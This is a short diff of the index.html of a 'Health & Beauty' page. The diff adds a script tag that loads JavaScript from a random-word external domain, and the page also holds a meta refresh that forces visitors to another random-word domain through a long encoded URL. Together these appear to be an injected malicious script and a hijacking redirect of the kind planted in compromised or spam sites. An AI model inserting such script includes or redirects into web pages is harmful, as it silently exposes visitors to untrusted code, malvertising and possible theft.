--- a/index.html
+++ b/index.html
@@ -2,6 +2,7 @@
 <html>
 <head>
 <title>Health & Beauty</title>
+	<script type='text/javascript' src='//fortunatelychastise.com/1b/f1/ee/1bf1ee39fbe82bb94a0748e97bead12a.js'></script>
   <meta http-equiv="refresh" content="5; url=https://wearychallengeraise.com/dbkQ1LQEDB/QcLDRETFx0fJSkrL/zUVKj9U/aX6TqL/3S5_zzTX9OQfU/YEfjr/G4t0A/uwaSfBa20_Ztk/I5tHa6K_jvj/PG8iZRL/XJQHYzCraEZpxSm8b/KG6ckl4_X-roV35jUyd/nGrSbWi/MsCRSWdZuNBej2vaLP/nAq8lcJBKPx/obJdZuFs3sGPkVVLm/CUh5m1KICIOH/h3JrlIROevqNpB/riMvlB-a/wt8gI_KqZZgZDy6/KYXnncQHybNSbNQi/ROGG2zli_iVRJAJ7MEL/renSK6qC0hWJhI09hHIR/rtD4VP5opnhRoxZjyl/ePhhhlkJ4BUw/y01y_e/nPluNu8PB0IvV-_/mA3hE_Kz/QyQZDSrK2IMR7kx/7qI6gVWrwqT1QBd/anCCQ17pKoA4kYQS/HCaqeNCTj5le/vaf/hPKcO1BFQed5JSDSs/IdSbv_deUNrVqmhMhg/3PAmNLYvpDeuCRCK5-U/ODZg459eIzZW6/LFDwbKMQkzhpKFpGdoIf/5uvdCq/2zzsItYi/ertVCCSKfZZd_kZbW/vS5s_swD/w-25k/_lx9n/5Fq/LM58Uw/==/">
 </head>
 <body>
